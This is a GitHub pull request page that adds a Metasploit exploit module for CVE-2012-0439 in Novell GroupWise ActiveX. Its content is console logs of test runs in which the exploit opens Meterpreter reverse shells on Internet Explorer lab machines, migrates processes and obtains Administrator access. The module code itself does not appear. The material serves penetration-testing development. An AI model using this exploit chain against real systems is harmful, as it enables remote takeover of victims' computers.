Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Added module for cve-2012-0439 #1469

Merged
merged 2 commits into from Feb 11, 2013
Merged

Added module for cve-2012-0439 #1469

merged 2 commits into from Feb 11, 2013

Conversation

jvazquez-r7
Copy link
Contributor

Testing results:

msf  exploit(novell_groupwise_gwcls1_actvx) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.128:4444 
[*] Using URL: http://0.0.0.0:8080/ypmPVzKuu1
[*]  Local IP: http://192.168.1.128:8080/ypmPVzKuu1
[*] Server started.
msf  exploit(novell_groupwise_gwcls1_actvx) > [*] 192.168.1.141    novell_groupwise_gwcls1_actvx - Requesting: /ypmPVzKuu1
[*] 192.168.1.141    novell_groupwise_gwcls1_actvx - Target selected as: IE 9 on Windows 7
[*] 192.168.1.141    novell_groupwise_gwcls1_actvx - Using JRE ROP
[*] 192.168.1.141    novell_groupwise_gwcls1_actvx - Sending HTML...
[*] Sending stage (752128 bytes) to 192.168.1.141
[*] Meterpreter session 2 opened (192.168.1.128:4444 -> 192.168.1.141:49342) at 2013-02-09 17:28:42 +0100
[*] Session ID 2 (192.168.1.128:4444 -> 192.168.1.141:49342) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (1444)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2304
[+] Successfully migrated to process 

msf  exploit(novell_groupwise_gwcls1_actvx) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.141 - Meterpreter session 2 closed.  Reason: User exit
msf  exploit(novell_groupwise_gwcls1_actvx) > 
[*] 192.168.1.141    novell_groupwise_gwcls1_actvx - Requesting: /ypmPVzKuu1
[*] 192.168.1.141    novell_groupwise_gwcls1_actvx - Target selected as: IE 8 on Windows 7
[*] 192.168.1.141    novell_groupwise_gwcls1_actvx - Using JRE ROP
[*] 192.168.1.141    novell_groupwise_gwcls1_actvx - Sending HTML...
[*] Sending stage (752128 bytes) to 192.168.1.141
[*] Meterpreter session 3 opened (192.168.1.128:4444 -> 192.168.1.141:49262) at 2013-02-09 17:32:27 +0100
[*] Session ID 3 (192.168.1.128:4444 -> 192.168.1.141:49262) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (1688)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2648
[+] Successfully migrated to process 

msf  exploit(novell_groupwise_gwcls1_actvx) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.141 - Meterpreter session 3 closed.  Reason: User exit
msf  exploit(novell_groupwise_gwcls1_actvx) > 
[*] 192.168.1.138    novell_groupwise_gwcls1_actvx - Requesting: /ypmPVzKuu1
[*] 192.168.1.138    novell_groupwise_gwcls1_actvx - Target selected as: IE 8 on Windows XP SP3
[*] 192.168.1.138    novell_groupwise_gwcls1_actvx - Using msvcrt ROP
[*] 192.168.1.138    novell_groupwise_gwcls1_actvx - Sending HTML...
[*] Sending stage (752128 bytes) to 192.168.1.138
[*] Meterpreter session 4 opened (192.168.1.128:4444 -> 192.168.1.138:1985) at 2013-02-09 17:34:40 +0100
[*] Session ID 4 (192.168.1.128:4444 -> 192.168.1.138:1985) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3744)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 664
[+] Successfully migrated to process 

msf  exploit(novell_groupwise_gwcls1_actvx) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

msf  exploit(novell_groupwise_gwcls1_actvx) > rexploit
[*] Stopping existing job...

[*] Server stopped.
[*] Server stopped.
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.128:4444 
[*] Using URL: http://0.0.0.0:8080/4vgXBC
[*]  Local IP: http://192.168.1.128:8080/4vgXBC
[*] Server started.
msf  exploit(novell_groupwise_gwcls1_actvx) > [*] 192.168.1.138    novell_groupwise_gwcls1_actvx - Requesting: /4vgXBC
[*] 192.168.1.138    novell_groupwise_gwcls1_actvx - Target selected as: IE 6 on Windows XP SP3
[*] 192.168.1.138    novell_groupwise_gwcls1_actvx - Sending HTML...
[*] Sending stage (752128 bytes) to 192.168.1.138
[*] Meterpreter session 5 opened (192.168.1.128:4444 -> 192.168.1.138:1285) at 2013-02-09 17:37:59 +0100
[*] Session ID 5 (192.168.1.128:4444 -> 192.168.1.138:1285) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: IEXPLORE.EXE (1156)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3444

msf  exploit(novell_groupwise_gwcls1_actvx) > [+] Successfully migrated to process 
s
[-] Unknown command: s.
msf  exploit(novell_groupwise_gwcls1_actvx) > sessions -i 5
[*] Starting interaction with 5...

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

@wchen-r7
Copy link
Contributor

Win:

msf  exploit(novell_groupwise_gwcls1_actvx) > [*]  Local IP: http://10.0.1.3:8080/bKT0TlLpGQ
[*] Server started.
[*] 10.0.1.6         novell_groupwise_gwcls1_actvx - Requesting: /bKT0TlLpGQ
[*] 10.0.1.6         novell_groupwise_gwcls1_actvx - Target selected as: IE 8 on Windows XP SP3
[*] 10.0.1.6         novell_groupwise_gwcls1_actvx - Using msvcrt ROP
[*] 10.0.1.6         novell_groupwise_gwcls1_actvx - Sending HTML...
[*] Sending stage (752128 bytes) to 10.0.1.6
[*] Meterpreter session 1 opened (10.0.1.3:4444 -> 10.0.1.6:1108) at 2013-02-11 10:39:48 -0600
[*] Session ID 1 (10.0.1.3:4444 -> 10.0.1.6:1108) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3460)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 184
[+] Successfully migrated to process

@wchen-r7 wchen-r7 merged commit 17b349a into rapid7:master Feb 11, 2013
@jvazquez-r7 jvazquez-r7 deleted the novell_groupwise_gwcls1_actvx branch November 18, 2014 15:53
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@jvazquez-r7 @wchen-r7